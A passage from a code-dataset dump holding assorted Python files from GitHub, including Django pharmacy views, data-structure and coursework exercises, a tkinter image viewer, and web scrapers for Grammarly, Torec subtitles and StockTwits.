range(self.y, self.y + self.h):\r\n linear_space[i + j * SQUARE_SIZE] = 1\r\n\r\n return linear_space\r\n\r\n def __str__(self):\r\n return self.str\r\n\r\ndef part1(claims):\r\n linear_space = defaultdict(int)\r\n for claim in claims:\r\n claim_space = claim.to_1d_space()\r\n for x in claim_space:\r\n linear_space[x] += 1\r\n\r\n overlaps = 0\r\n for elem in linear_space:\r\n if linear_space[elem] > 1:\r\n overlaps += 1\r\n\r\n print(\"overlaps: {}\".format(overlaps))\r\n\r\n\r\ndef part2(claims):\r\n linear_space = defaultdict(int)\r\n for claim in claims:\r\n claim_space = claim.to_1d_space()\r\n for x in claim_space:\r\n linear_space[x] += 1\r\n\r\n for claim in claims:\r\n correct_claim = True\r\n\r\n for i in range(claim.x, claim.x + claim.w):\r\n for j in range(claim.y, claim.y + claim.h):\r\n if linear_space[i + j * SQUARE_SIZE] != 1:\r\n correct_claim = False\r\n\r\n if correct_claim:\r\n print(\"unique claim: {}\".format(claim))\r\n\r\n\r\n\r\n\r\ndef main():\r\n claims = []\r\n with open(\"input\", \"r\") as f:\r\n claims_str = f.read().split(\"\\n\")\r\n for claim_str in claims_str:\r\n claims.append(Claim(claim_str))\r\n\r\n part1(claims)\r\n part2(claims)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"CLEMENTINATOR/AdventOfCode2018","sub_path":"03122018/03122018.py","file_name":"03122018.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38101489467","text":"from django.shortcuts import render,redirect\nfrom Pharma.models import Medicine,Transactions\nfrom Pharma.forms import MedicineForm, TransactionsForm\nfrom django.shortcuts import get_object_or_404\nfrom django.forms import modelformset_factory,inlineformset_factory\n# Create your views here.\n\n\ndef login_page(request):\n if request.method == 'POST':\n return redirect('Pharma:home')\n return render(request, 'login.html')\n\n# def create_med(request):\n# Formset = inlineformset_factory( Medicine,\n# extra = 5,\n# fields = ('scientific_name','trade_name','alternate1', 'alternate2' ,'qnt', 'item_price', 'start_date','end_date'),\n# )\n# if request.method == 'POST':\n# form = Formset(request.POST)\n# form.save()\n# return redirect('Pharma:medicine')\n# form = Formset(queryset = Medicine.objects.none())\n# return render(request, 'createmed.html', {'form':form})\n\ndef create_med(request):\n Formset = modelformset_factory(Medicine, fields = ('scientific_name','trade_name','alternate1', 'alternate2' ,'qnt', 'item_price', 'start_date','end_date'), extra=5)\n if request.method == 'POST':\n form = Formset(request.POST)\n form.save()\n return redirect('Pharma:medicine')\n form = Formset(queryset = Medicine.objects.none())\n return render(request, 'createmed.html', {'form':form})\n\ndef create_trans(request):\n Formset = modelformset_factory(Transactions, fields = ('med_name','sell_qnt','sell_price', 'sell_date'), extra=5)\n if request.method == 'POST':\n form = Formset(request.POST)\n form.save()\n return redirect('Pharma:transactions')\n form = Formset(queryset = Transactions.objects.none())\n return render(request, 'createtrans.html', {'form':form})\n\ndef list_medicine(request):\n medicine_list = Medicine.objects.order_by('trade_name')\n return render(request, 'listmedicine.html', {'medicine_records':medicine_list})\n\ndef list_transactions(request):\n transactions_list = Transactions.objects.order_by('med_name')\n return render(request, 'listtransactions.html', {'transactions_records':transactions_list})\n\ndef get_loggedin_user(request):\n name = request.POST['uname']\n print(name)\n return render(request, 'master.html', {'your_name':name})\n\ndef update_medicine(request, id = None):\n form = MedicineForm()\n instance = get_object_or_404(Medicine, id = id)\n form = MedicineForm(instance=instance)\n\n if request.method == 'POST':\n form = MedicineForm(request.POST, instance=instance)\n\n if form.is_valid():\n print(\"form is valid\")\n instance.save()\n return redirect('Pharma:medicine')\n\n context = {\n 'form' : form\n }\n\n return render(request, 'modelform.html', context)\n\n\ndef delete_medicine(request, id =None):\n instance = get_object_or_404(Medicine, id = id)\n if request.method == 'POST':\n instance.delete()\n # return redirect('Pharma:medicine')\n return render(request, 'listmedicine.html', {'insert_med':instance})\n\n\ndef update_transaction(request, id = None):\n form = TransactionsForm()\n instance = get_object_or_404(Transactions, id = id)\n form = TransactionsForm(instance=instance)\n\n if request.method == 'POST':\n form = TransactionsForm(request.POST, instance=instance)\n\n if form.is_valid():\n print(\"form is valid\")\n instance.save()\n return redirect('Pharma:transactions')\n\n context = {\n 'form' : form\n }\n\n return render(request, 'modelform.html', context)\n\n\ndef delete_transaction(request, id =None):\n instance = get_object_or_404(Transactions, id = id)\n if request.method == 'POST':\n instance.delete()\n # return redirect('Pharma:transactions')\n return render(request, 'listtransactions.html', {'insert_med':instance})\n","repo_name":"daliaakram/PharmacyProject","sub_path":"Pharma/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40420788724","text":"class Node:\n def __init__(self,value):\n self.value = value\n self.left = None\n self.right = None\n \n \nclass BinarySearchTree:\n def __init__(self):\n self.root = None\n \n def insert(self,value):\n new_node = Node(value)\n if self.root is None:\n self.root = new_node\n return True\n else:\n curr = self.root\n while curr is not None:\n if new_node.value == curr.value:\n return False\n if value < curr.value:\n if curr.left is None:\n curr.left = new_node\n return True\n curr = curr.left\n else:\n if curr.right is None:\n curr.right = new_node\n return True\n curr = curr.right\n\n def contains(self,value):\n curr = self.root\n while curr is not None:\n if curr.value == value:\n return True\n if value < curr.value:\n if curr.left is None:\n return False\n curr = curr.left\n else: \n if curr.right is None:\n return False\n curr = curr.right\n return False\n \n\n \nmy_tree = BinarySearchTree()\nprint(my_tree.contains(52))\nmy_tree.insert(47)\nmy_tree.insert(21)\nmy_tree.insert(76)\nmy_tree.insert(18)\nmy_tree.insert(52)\n\nprint(my_tree.contains(52))\n\n\n\nprint(my_tree.root.value)\nprint(my_tree.root.left.value)\nprint(my_tree.root.left.left.value)\nprint(my_tree.root.right.value)\nprint(my_tree.root.right.left.value)\n\n\n","repo_name":"ddoddii/Study-repo","sub_path":"algorithm/Data_Structures_Algorithms/Trees/EXERCISE-BST.py","file_name":"EXERCISE-BST.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11328263881","text":"\"\"\"\n# WRITER : Dor Peleg , dor.peleg , 312163421\n# EXERCISE : intro2cs1 Ex3 2021\n\"\"\"\n\n\ndef input_list():\n \"\"\"\n The function receives inputs from user,\n and returns a list of the inputs, and their sum at the end of the list.\n \"\"\"\n num_lst = []\n num_sum = 0\n while True:\n num = input()\n if num == \"\":\n break\n num_lst.append(float(num))\n num_sum += float(num)\n num_lst.append(num_sum)\n return num_lst\n\n\ndef inner_product(vec_1, vec_2):\n \"\"\"\n The function gets two lists of numbers,\n and returns their inner product.\n \"\"\"\n ip = 0\n if id(vec_1) == id(vec_2):\n return\n elif len(vec_1) != len(vec_2):\n return None\n for i in range(len(vec_1)):\n ip += vec_1[i] * vec_2[i]\n return ip\n\n\ndef sequence_monotonicity(sequence):\n \"\"\"\n The function receives a sequence (list of numbers),\n and returns if the sequence is\n monotonically increasing, strictly monotonically increasing,\n monotonically decreasing or strictly monotonically decreasing\n as a list of boolean values.\n \"\"\"\n boolean_lst = [True, True, True, True]\n for i in range(1, len(sequence)):\n if sequence[i - 1] > sequence[i]:\n boolean_lst[0] = False\n if sequence[i - 1] >= sequence[i]:\n boolean_lst[1] = False\n if sequence[i - 1] < sequence[i]:\n boolean_lst[2] = False\n if sequence[i - 1] <= sequence[i]:\n boolean_lst[3] = False\n return boolean_lst\n\n\ndef monotonicity_inverse(def_bool):\n \"\"\"\n The function receives a list of 4 boolean values\n and returns a list of 4 numbers representing a Sequence\n that is an example of a Sequence according to the received list.\n \"\"\"\n if not def_bool[0] and not def_bool[1] and \\\n not def_bool[2] and not def_bool[3]:\n return [1, 2, 1, 2]\n\n if def_bool[0]:\n if def_bool[3]:\n return None\n elif def_bool[1]:\n if def_bool[2]:\n return None\n return [1, 2, 3, 4]\n elif def_bool[2]:\n return [1, 1, 1, 1]\n return [1, 2, 2, 4]\n\n if def_bool[2]:\n if def_bool[1]:\n return None\n elif def_bool[3]:\n return [4, 3, 2, 1]\n return [4, 3, 3, 1]\n\n return None\n\n\ndef primes_for_asafi(n):\n \"\"\"\n The function gets an integer n\n and returns a list of the first n prime numbers.\n \"\"\"\n primes = []\n num = 2\n while len(primes) < n:\n prime = True\n for i in primes:\n if num % i == 0:\n prime = False\n if prime:\n primes.append(num)\n num += 1\n return primes\n\n\ndef sum_of_vectors(vec_lst):\n \"\"\"\n The function receives a list of vectors (list of lists)\n and returns a vector (list) which is their vector sum.\n \"\"\"\n vec_sum = []\n if len(vec_lst) == 0:\n return None\n else:\n for i in range(len(vec_lst[0])):\n index_sum = 0\n for j in vec_lst:\n index_sum += j[i]\n vec_sum.append(index_sum)\n return vec_sum\n\n\ndef num_of_orthogonal(vectors):\n \"\"\"\n The function receives a list of vectors (list of lists)\n and returns the number of pairs of lists\n that are perpendicular to each other\n \"\"\"\n counter = 0\n for i in vectors:\n for j in vectors:\n if inner_product(i, j) == 0:\n counter += 1\n return int(counter / 2)\n","repo_name":"dor-peleg/University","sub_path":"First_year/Intro/Ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18836139871","text":"# https://leetcode.com/explore/challenge/card/july-leetcoding-challenge-2021/611/week-4-july-22nd-july-28th/3827/\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def sortedArrayToBST(self, a: List[int]) -> TreeNode:\n if not a:\n return None\n mid=len(a)//2\n root = TreeNode(val=a[mid])\n root.left=self.sortedArrayToBST(a[:mid])\n root.right=self.sortedArrayToBST(a[mid+1:])\n return root","repo_name":"Tejas1510/Leetcode-Daily-Question","sub_path":"August/aug26_arrayToBST.py","file_name":"aug26_arrayToBST.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35829528826","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nimport numpy as np\nimport pandas as pd\nimport time\nimport pickle\nfrom selenium.webdriver.common.keys import Keys;\n\ndef grammarly_scoring(text_dataset):\n driver_location = \"/usr/bin/chromedriver\"\n pickle_location = \"grammarly.pkl\"\n chrome_options = Options()\n chrome_options.add_experimental_option(\"detach\", True)\n grammarly_query = \"https://app.grammarly.com\" \n grammarly_driver, grammarly_input = initialize_grammarly_driver(driver_location, chrome_options, grammarly_query, pickle_location)\n scores = pd.DataFrame(columns = ['Score'])\n checkpoint_after = 10\n\n for index, row in text_dataset.iterrows():\n try:\n score, grammarly_input, grammarly_driver = get_plagiarism(grammarly_driver, grammarly_input, row['Text'])\n scores = scores.append({'Score': score}, ignore_index = True)\n except:\n scores = scores.append({'Score': np.NAN}, ignore_index = True)\n \n if index % checkpoint_after == 0:\n scores.to_csv(\"Grammarly_Scores.csv\")\n\n scores.to_csv(\"Grammarly_Scores.csv\")\n\n return \"Grammarly_Scores.csv\"\n\ndef initialize_grammarly_driver(driver_location, chrome_options, query, pickle_location): \n\n driver = webdriver.Chrome(driver_location, chrome_options = chrome_options) #Initializing selenium chromedriver\n \n driver.get(query)\n cookies = pickle.load(open(pickle_location, \"rb\"))\n for cookie in cookies:\n driver.add_cookie(cookie)\n\n driver.get(query)\n\n time.sleep(5)\n new = driver.find_element(By.XPATH, \"//*[@id='page']/div/div/main/div[4]/div/section/div/div/div[1]/div/div[2]/div\")\n new.click()\n\n time.sleep(5)\n input = driver.find_element(By.XPATH, \"//*[@id='page']/div/div[2]/div[2]/div/div[4]/div[3]/div/main/div/div/div[10]/div[1]/p\")\n input.send_keys(\"Test\")\n\n time.sleep(5)\n plag = driver.find_element(By.XPATH, \"//*[@id='navbar-right']/div[2]/div/div[3]/div[3]\")\n plag.click()\n\n return driver, input\n\ndef get_plagiarism(driver, input, text):\n \n input.send_keys(text)\n\n time.sleep(10)\n if(driver.find_elements(By.XPATH, \"//*[name() = 'svg'][contains(@class, 'circular_f1rbnyxg')]/*[name()='text']\")):\n b6 = driver.find_element(By.XPATH, \"//*[name() = 'svg'][contains(@class, 'circular_f1rbnyxg')]/*[name()='text']\")\n input.clear()\n return np.float16(b6.text.replace(\"%\",\"\")), input, driver\n\n input.clear()\n return 0, input, driver\n\n\n","repo_name":"czhuai/CS640-Project-Team-10","sub_path":"large_dataset/grammarly.py","file_name":"grammarly.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23941125024","text":"from django_select2.forms import *\nfrom django import forms\nfrom documentos.models import *\n\nclass DateInput(forms.DateInput):\n \"\"\"docstring forDateInput.\"\"\"\n input_type = 'date'\n\n\nclass TimeInput(forms.TimeInput):\n \"\"\"docstring forTime.\"\"\"\n input_type='time'\n\nclass DocumentoForm(forms.ModelForm):\n \"\"\"DocumentoForm description)\"\"\"\n\n class Meta:\n model = Documento\n\n fields='__all__'\n\n labels={\n 'usuario' : 'Participante'\n }\n widgets={\n 'fecha_inicio':DateInput(),\n 'hora':TimeInput(),\n 'fecha_fin':DateInput(),\n 'usuario':Select2MultipleWidget,\n 'entidad_emisora':Select2MultipleWidget,\n }\n\nclass EntidadEmisoraForm(forms.ModelForm):\n \"\"\"docstring for EntidadEmisoraForm.\"\"\"\n class Meta:\n model = EntidadEmisora\n\n fields='__all__'\n","repo_name":"DaxH/Certificado","sub_path":"documentos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7571487888","text":"#This is the Extra Credit Part of Our Homework\nfrom graphics import *\nfrom HW6_Map import initializeMap\nfrom graphics import *\nfrom LatLongToPixels import *\nfrom HW6_Filter import *\nfrom RealestateData import *\ndef Extracredit():\n win=initializeMap('SacramentoMap.gif', 707, 774)\n #get and draw two end points of line\n Text(Point(360,680),\"Click on one point on the map and then click on another point the required distance apart\").draw(win)\n p1 = win.getMouse()\n p1.draw(win)\n p2 = win.getMouse()\n p2.draw(win)\n x1 = p1.getX()\n x2 = p2.getX()\n y1 = p1.getY()\n y2 = p2.getY()\n C=LatLong(707,774,38.24,39.03,-121.56,-120.6)\n one= C.pixels2LatLong(x1,y1)\n two= C.pixels2LatLong(x2,y2)\n a1,a2=one\n b1,b2=two\n d=distanceMiles(a1,a2,b1,b2)\n return filter(a2,a1,d) #see readme file to understand the output you get\n\n","repo_name":"rtl019/MLpractice","sub_path":"extracredit.py","file_name":"extracredit.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37867381370","text":"from operator import le\nfrom ordered_weighted_avg import OWA\n\ndef shimura_technique(ranks, improve = False) :\n print(\"Shimura Technique\")\n length = len(ranks[0])\n n = len(ranks)\n f = [[0.0 for x in range(length)] for y in range(length)] \n\n print(\"f_x_j(x_i) = |k\\u0395[1, N] ^ l_k(x_i) < l_k(x_j)| / N = \")\n for x_i in range(length):\n for x_j in range(length):\n if x_i == x_j:\n f[x_i][x_j] = 1\n else:\n count = 0\n for rank in ranks:\n if rank[x_i] < rank[x_j]:\n count+=1\n f[x_i][x_j] = round(count/n, 4)\n print(f[x_i][x_j], end = \"\\t\")\n print()\n\n if not improve:\n find_minimum(length, f)\n\n else:\n improved_shimura_technique(length, f)\n \n\ndef find_minimum(length, f):\n minimum_c = []\n print(\"Where this func. is taken to be the membership of preferring x_i over x_j\")\n print(\"f(x_i|x_j) = f_x_j(x_i) / max(f_x_j(x_i), f_x_j(x_j)) = \")\n for x_i in range(length):\n minimum = f[x_i][0]\n for x_j in range(length):\n maximum = max(f[x_i][x_j], f[x_j][x_i])\n f[x_i][x_j] = round(f[x_i][x_j] / maximum, 4)\n minimum = min(f[x_i][x_j], minimum)\n print(f[x_i][x_j], end = \"\\t\")\n minimum_c.append([minimum, x_i])\n print()\n\n print(\"C_j = minimum of each row = \")\n for minimum in minimum_c:\n print(minimum[1], f\"[{minimum[0]}]\") \n\n print(\"ordering of pages with minimum value = \")\n minimum_c.sort()\n for minimum in minimum_c:\n print(minimum)\n\ndef improved_shimura_technique(length, f):\n minimum_c = []\n for x, val in enumerate(f):\n val.sort(reverse = True)\n ob = OWA(0.0, .5, val)\n atleast_half = ob.find_weight()\n minimum_c.append([atleast_half, x])\n \n print(\"Based on Condorcet Criteria: if some element d belonging to a set defeats \\\n \\nevery other element in pairwirse majority voting, then this element is ranked first; \\\n \\nnecessary for span fighting. \")\n print(\"Atleast half of each row = \")\n for minimum in minimum_c:\n print(minimum[1], f\"[{minimum[0]}]\") \n\n print(\"ordering of pages with minimum value = \")\n minimum_c.sort(reverse=True)\n for minimum in minimum_c:\n print(minimum)\n\ndef main():\n n = int(input(\"Enter the number of lists : \"))\n k = int(input(\"Enter the number of pages : \"))\n ranks = []\n for i in range(n):\n ranks.append([0]*k)\n for j,rank in enumerate(input().strip().split()):\n ranks[i][int(rank)-1] = j+1\n\n improved = input(\"Improved shimura technique (y/n) :\") == 'y'\n shimura_technique(ranks, improved)\n \nif __name__ == \"__main__\":\n main()","repo_name":"Asra2000/COE4380","sub_path":"shimura_technique.py","file_name":"shimura_technique.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2068506290","text":"import tkinter as tk\nfrom tkinter import END, ttk\nimport os\nfrom PIL import ImageTk, Image\nimport random as rand\n\nfrom config import *\nfrom ImageDisplayer import *\n\nclass ViewPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n\n self.ID = \"VIEW\"\n\n # TITLE\n l = ttk.Label(self, text=\"Saved Images\")\n l.grid(row=0, column=2, pady=20)\n\n # Back Button\n BACK = ttk.Button(self, text=\"Back to Home\", command=lambda:[controller.showFrame(\"HOME\"), self.hideCaptions()])\n BACK.grid(row=11, column=0, pady=20)\n\n # Canvas \n self.CANVAS = tk.Canvas(self, width=CANVAS_W, height=CANVAS_H, bd=5, relief=\"raised\")\n self.CANVAS.grid(row=1, column=0, rowspan=10, columnspan=5)\n\n # Caption list\n self.TEXT_LIST = []\n\n # Images\n self.IMG_LIST = []\n self.IMG_LIST = IM_loadImageList(SIMG_DIR)\n if len(self.IMG_LIST) > 1:\n self.INDEX = rand.randint(0, len(self.IMG_LIST)-1)\n else:\n self.INDEX = 0\n IM_viewImage(SIMG_DIR, self.CANVAS, self.IMG_LIST, self.INDEX)\n\n # Scroll images\n right_b = ttk.Button(self, text=\"->\", command=lambda:[self.moveIndex(1), IM_viewImage(SIMG_DIR, self.CANVAS, self.IMG_LIST, self.INDEX), self.loadCaptions()])\n right_b.grid(row=0, column=3)\n left_b = ttk.Button(self, text=\"<-\", command=lambda:[self.moveIndex(-1), IM_viewImage(SIMG_DIR, self.CANVAS, self.IMG_LIST, self.INDEX), self.loadCaptions()])\n left_b.grid(row=0, column=1)\n\n # Add caption button\n addcaption_b = ttk.Button(self, text=\"Add Caption\", command=lambda:self.createCaption())\n addcaption_b.grid(row=0, column=4)\n\n # Save caption button\n savecaption_b = ttk.Button(self, text=\"Save Caption\", command=lambda:[self.saveCaptions()])\n savecaption_b.grid(row=0, column=0)\n\n def saveCaptions(self):\n if self.IMG_LIST:\n c = \"\"\n for t in self.TEXT_LIST:\n c += t.get(\"1.0\", END)\n\n with open(\"SavedImages/Captions/\"+self.IMG_LIST[self.INDEX]+\".txt\", 'w+') as f:\n f.write(c)\n f.close()\n\n def createCaption(self, text=\"\"):\n t = tk.Text(self, width=30, height=5)\n t.grid(row=1+len(self.TEXT_LIST), column=5)\n if text != \"\":\n t.insert(tk.END, text)\n self.TEXT_LIST.append(t)\n\n def moveIndex(self, x):\n if self.INDEX + x < 0:\n self.INDEX = len(self.IMG_LIST)-1\n elif self.INDEX + x == len(self.IMG_LIST):\n self.INDEX = 0\n else:\n self.INDEX += x\n\n def hideCaptions(self):\n for t in self.TEXT_LIST:\n t.destroy()\n\n def loadCaptions(self):\n if self.IMG_LIST:\n for t in self.TEXT_LIST:\n t.destroy()\n self.TEXT_LIST = []\n ptf = \"SavedImages/Captions/\"+self.IMG_LIST[self.INDEX]+\".txt\"\n if os.path.exists(ptf):\n f = open(ptf, 'r')\n captions = f.read()\n listc = captions.split(\"\\n\")\n for c in listc:\n self.createCaption(c)\n","repo_name":"blucas6/tkinter-image-viewer","sub_path":"ViewPage.py","file_name":"ViewPage.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41258252973","text":"import os\n\nfrom sentry_sdk.api import configure_scope\nfrom sentry_sdk.integrations import Integration\n\n\ndef _read_classad(filename):\n with open(filename) as f:\n for line in f:\n key, _, value = line.partition('=')\n key = key.strip()\n value = value.strip().strip('\"')\n yield key, value\n\n\nclass CondorIntegration(Integration):\n \"\"\"Custom Sentry integration to report the HTCondor job ID.\"\"\"\n\n identifier = 'condor'\n\n @staticmethod\n def setup_once():\n try:\n data = dict(_read_classad(os.environ['_CONDOR_JOB_AD']))\n except (KeyError, IOError):\n pass\n else:\n with configure_scope() as scope:\n scope.set_tag('htcondor.cluster_id', '{}.{}'.format(\n data['ClusterId'], data['ProcId']))\n","repo_name":"lpsinger/gwcelery","sub_path":"gwcelery/sentry/integrations/condor.py","file_name":"condor.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71929996646","text":"import logging\r\nlogger = logging.getLogger(\"subit.api.providers.torec.hamster\")\r\nfrom threading import Thread\r\nfrom collections import deque, namedtuple\r\nimport time\r\n\r\nfrom api.providers.torec.provider import TOREC_PAGES\r\n\r\n__all__ = ['TorecHashCodesHamster']\r\n\r\n\r\n# Time it takes for us to invalidate a ticket. The value is taken from the JS\r\n# in torec handling the waiting time.\r\nMAX_TICKET_SECS = 10\r\nTICKETS_QUEUE_SIZE = 5\r\nRUNNER_MAIN_LOOP_SLEEP_SECS = 1\r\n# The time each sub id will live inside the hamster. After this long, the sub\r\n# id will be removed from the list.\r\nMAX_TIME_FOR_SUB_ID_SECS = 120\r\n\r\n\r\nclass SubIDRecord(object):\r\n def __init__(self, \r\n time_added, post_content, tickets = deque(maxlen=TICKETS_QUEUE_SIZE)):\r\n\r\n self.time_added = time_added\r\n self.post_content = post_content\r\n self.tickets = tickets\r\n\r\n @property\r\n def should_remove(self):\r\n return (int(time.time()) - self.time_added) > MAX_TIME_FOR_SUB_ID_SECS\r\n\r\n def __str__(self):\r\n return repr(self)\r\n\r\n def __repr__(self):\r\n return (\"<SubIDRecord time_added={0.time_added} \"\r\n \"post_content={0.post_content} tickets={0.tickets}>\".format(self))\r\n\r\n\r\nclass TorecTicket(object):\r\n def __init__(self, sub_id, time_got, guest_code):\r\n self.sub_id = sub_id\r\n self.time_got = time_got\r\n self.guest_code = guest_code\r\n logger.debug(\"Constructed a ticket: {}\".format(self))\r\n\r\n @property\r\n def time_past(self):\r\n return int(time.time()) - self.time_got\r\n \r\n @property\r\n def time_to_wait(self):\r\n return MAX_TICKET_SECS - self.time_past\r\n\r\n @property\r\n def is_still_valid(self):\r\n return self.time_to_wait >= 0\r\n\r\n def wait_required_time(self):\r\n ttw = self.time_to_wait\r\n if ttw:\r\n logger.debug(\"Ticket requires sleeping for {} secs\".format(ttw))\r\n time.sleep(ttw)\r\n\r\n def __str__(self):\r\n return repr(self)\r\n\r\n def __repr__(self):\r\n return (\"<TorecTicket sub_id={0.sub_id} \"\r\n \"time_got={0.time_got} guest_code={0.guest_code}>\".format(self))\r\n\r\n\r\nclass TorecHashCodesHamster(object):\r\n \"\"\"\r\n The hamster is responsible for obtaining download tickets from Torec's \r\n servers for all the sub_ids that was passed to it.\r\n\r\n The hamster iterates over all its sub_ids, and makes sure that they have\r\n valid ticket. Each sub_id has a queue of size TICKETS_QUEUE_SIZE that gets\r\n filled as time passes.\r\n\r\n The hamster keeps requesting tickets for a given sub_id until the user marks\r\n that sub_id for deletion.\r\n \"\"\"\r\n def __init__(self, requests_manager):\r\n self._requests_manager = requests_manager\r\n\r\n self._should_stop = False\r\n self._records = {}\r\n # Start at his own thread.\r\n hamsterRunner = Thread(target=self._runner)\r\n hamsterRunner.daemon = True\r\n hamsterRunner.start()\r\n\r\n def __del__(self):\r\n \"\"\" \r\n On destruction, we call the stop method in order to stop the worker \r\n thread.\r\n \"\"\"\r\n self.stop()\r\n\r\n def _ensure_has_ticket(self, sub_id):\r\n record = self._records[sub_id]\r\n\r\n guest_code = None\r\n while not guest_code:\r\n logger.debug(\r\n \"Getting ticket with: {}\".format(record.post_content))\r\n guest_code = self._requests_manager.perform_request_next(\r\n TOREC_PAGES.TICKET,\r\n data = record.post_content)\r\n if guest_code == 'error':\r\n logger.error(\r\n \"Failed getting ticket for sub_id: {}\".format(sub_id))\r\n\r\n time_got = int(time.time())\r\n ticket = TorecTicket(sub_id, time_got, guest_code)\r\n logger.debug(\"Got ticket: {}\".format(ticket))\r\n record.tickets.append(ticket)\r\n\r\n def _runner(self):\r\n \"\"\" \r\n The worker in this class. each 5 secs send request for hash code, and \r\n stores it in the queue, the queue is built from tuple -> (time of \r\n request, hash code). After 10 items, the queue is blocked.\r\n \"\"\"\r\n logger.debug(\"_runner started.\")\r\n\r\n while not self._should_stop:\r\n # Because the dict might change during iteration, we can't use the \r\n # iterX methods.\r\n for sub_id in self._records.keys():\r\n record = self._records[sub_id]\r\n if record.should_remove:\r\n logger.debug(\r\n \"_runner Removing record for sub_id: {}\".format(sub_id))\r\n del self._records[sub_id]\r\n else:\r\n self._ensure_has_ticket(sub_id)\r\n\r\n time.sleep(RUNNER_MAIN_LOOP_SLEEP_SECS)\r\n \r\n logger.debug(\"_runner ending.\")\r\n\r\n def stop(self):\r\n \"\"\" Signals the working thread to stop. \"\"\"\r\n self._should_stop = True\r\n\r\n def add_sub_id(self, sub_id):\r\n \"\"\" \r\n Adds sub_id to the dict. Does not check whether or not that sub_id is\r\n in the dict already. This means that if a ticket was already obtained, \r\n it will be removed for that sub_id.\r\n \"\"\"\r\n # s according to Torec's JS is the screen width.\r\n post_content = {\"sub_id\" : sub_id, \"s\" : 1600}\r\n logger.debug(\"Constructed post_content: {}\".format(post_content))\r\n record = SubIDRecord(int(time.time()), post_content)\r\n self._records[sub_id] = record\r\n\r\n def remove_sub_id(self, sub_id):\r\n del self._records[sub_id]\r\n\r\n def _get_valid_ticket(self, sub_id):\r\n record = self._records[sub_id]\r\n tickets = record.tickets\r\n while not tickets:\r\n time.sleep(0.5)\r\n\r\n ticket = tickets.popleft()\r\n while not ticket.is_still_valid and tickets:\r\n ticket = tickets.popleft()\r\n\r\n # Recursion if there are no valid tickets\r\n if not ticket.is_still_valid:\r\n return _get_valid_ticket(sub_id)\r\n\r\n return ticket\r\n \r\n def get_ticket(self, sub_id):\r\n \"\"\" \r\n Retrieve the ticket associated with the provided sub_id. If the sub_id \r\n is not in the dict, this methods adds it. \r\n\r\n The method waits until the appropriate time is passed for that ticket.\r\n \"\"\"\r\n if sub_id not in self._records:\r\n self.add_sub_id(sub_id)\r\n\r\n ticket = self._get_valid_ticket(sub_id)\r\n logger.debug(\"Got a ticket: {}\".format(ticket))\r\n ticket.wait_required_time()\r\n\r\n return ticket\r\n \r\n","repo_name":"yosi-dediashvili/SubiT","sub_path":"src/api/providers/torec/hamster.py","file_name":"hamster.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"34043931125","text":"import requests\nimport settings\nimport json\nimport logging\nimport os\nimport datetime\nfrom time import sleep\n\nlogger = settings.get_logger(os.path.realpath(__file__))\n\ndef run_collect(company, total_req):\n\n logger.info(company + \" started\")\n\n # files and vars\n today = datetime.date.today()\n yesterday = today - datetime.timedelta(1)\n two_days_ago = today - datetime.timedelta(2)\n file_name = settings.DOWNLOADS_STWITS + \"/\" + company + \"/stwits-\" + company + \"-\" + str(yesterday) + \".csv\"\n dir = os.path.dirname(os.path.realpath(file_name))\n os.makedirs(dir, exist_ok=True)\n output = open(file_name, \"a\")\n\n max_id = '99999999'\n\n\n\n for j in range(0,1000):\n total_req +=1\n if total_req == 200:\n sleep(3600)\n total_req = 1\n\n logger.info(company + \": \" + str(j))\n\n if(company == \"the\"):\n url = 'https://api.stocktwits.com/api/2/streams/suggested.json?max=' + str(max_id)\n else:\n url = 'https://api.stocktwits.com/api/2/streams/symbol/' + company + '.json?max=' + str(max_id)\n\n req = requests.get(url).json()\n\n for i in range(0,30):\n\n if (req['messages'][i]['entities']['sentiment'] is not None):\n sentiment = req['messages'][i]['entities']['sentiment']['basic']\n else:\n sentiment = \"none\"\n created_at = req['messages'][i]['created_at']\n text = req['messages'][i]['body']\n\n\n # keep yesterday only\n if str(created_at)[0:10] == str(two_days_ago):\n logger.info(company + \" last id: \" + str(req['cursor']['max']))\n return total_req\n\n logger.debug(created_at + ', ' + sentiment + ', ' + text)\n output.write('\"' + created_at + '\",\"' + sentiment + '\",\"' + text + '\"\\n')\n\n max_id = req['cursor']['max']\n logger.debug('max_id: ' + str(max_id))\n\n logger.debug(json.dumps(req, indent=4, sort_keys=True))\n\n return total_req\n\n\n##################\n# start\nlogger.info(\"starting \" + 